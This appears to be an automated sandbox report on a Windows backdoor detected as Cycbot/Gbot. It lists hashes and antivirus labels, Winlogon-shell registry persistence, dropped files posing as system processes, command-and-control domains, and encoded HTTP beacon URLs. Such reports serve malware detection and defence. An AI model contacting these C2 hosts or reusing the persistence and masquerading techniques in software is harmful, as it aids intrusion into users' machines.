Analysis Date: 2015-01-17 13:28:38
MD5: ddc6e875e35685c455ddd295a318f43b
SHA1: 1c267368199d7607df719e0e1329bfbd7763a9bb

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 8f3819d1b283600ca67628eb0e596540 sha1: cc771e9371cd83fb88ac9ca4c1ff05effdcb4fc9 size: 118784
Section: .rdata md5: a973043c2a7c573427803db06590e645 sha1: c3f33c2533a03c1533b5cf32ed4b113dea3d9af4 size: 1024
Section: .data md5: bd8b4620f850e94dc53f9c8a34469d9f sha1: 2689b7640d7102772679de2703822f2f7398d1b9 size: 18944
Section: .rsrc md5: c9772c48e2ba87cc67819e68072ad3b7 sha1: 073295b6b98fb7af735a27add7fed697114d19b8 size: 1024
Timestamp: 2005-11-13 07:14:49
Version: PrivateBuild: 1134
PEhash: 78b02c6c6cd5306b7c6215c8baa95c4358b9ff99
IMPhash: 1d695fe3f38bbce538ef3630022c86e3
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Trojan.Heur.KS.1
AV Authentium: W32/Goolbot.C.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Diple-19
AV Dr. Web: Trojan.DownLoader1.44812
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.IVA
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.C.gen!Eldorado
AV F-Secure: Trojan-Downloader:W32/Renos.GTC
AV Grisoft (avg): Agent.5.BJ
AV Ikarus: Packed.Win32.Krap
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.bs
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.e
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Rising: no_virus
AV Sophos: Troj/FakeAV-CDG
AV Symantec: Trojan.Gen.2
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: dolbyaudiodevice.com
Winsock DNS: zoneck.com
Winsock DNS: www.google.com
Winsock DNS: motherboardstest.com
Winsock DNS: 127.0.0.1
Winsock DNS: zonejm.com
Winsock DNS: pcdocpro.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: pcdocpro.com, Type: A, 209.59.161.20
DNS: zonejm.com, Type: A, 23.239.15.54
DNS: www.google.com, Type: A, 173.194.37.80
DNS: www.google.com, Type: A, 173.194.37.84
DNS: www.google.com, Type: A, 173.194.37.83
DNS: www.google.com, Type: A, 173.194.37.82
DNS: www.google.com, Type: A, 173.194.37.81
DNS: motherboardstest.com, Type: A, 204.11.56.45
DNS: zoneck.com, Type: A, 208.79.234.132
DNS: xibudific.cn, Type: A
DNS: dolbyaudiodevice.com, Type: A
HTTP GET: http://pcdocpro.com/images/logo-1.jpg?tq=gHZutDyMv5rJeTXia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: gbot/2.3
HTTP GET: http://zonejm.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUz6ow8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51MortCC5IaGUUmp19LyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz6ow8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz6ow8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUp0OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GET: http://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUp0OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GET: http://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUp0OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP: 192.168.1.1:1031 ➝ 209.59.161.20:80
Flows TCP: 192.168.1.1:1032 ➝ 23.239.15.54:80
Flows TCP: 192.168.1.1:1033 ➝ 173.194.37.80:80
Flows TCP: 192.168.1.1:1034 ➝ 173.194.37.80:80
Flows TCP: 192.168.1.1:1035 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1036 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1037 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1038 ➝ 23.239.15.54:80
Flows TCP: 192.168.1.1:1039 ➝ 23.239.15.54:80

Raw Pcap

Strings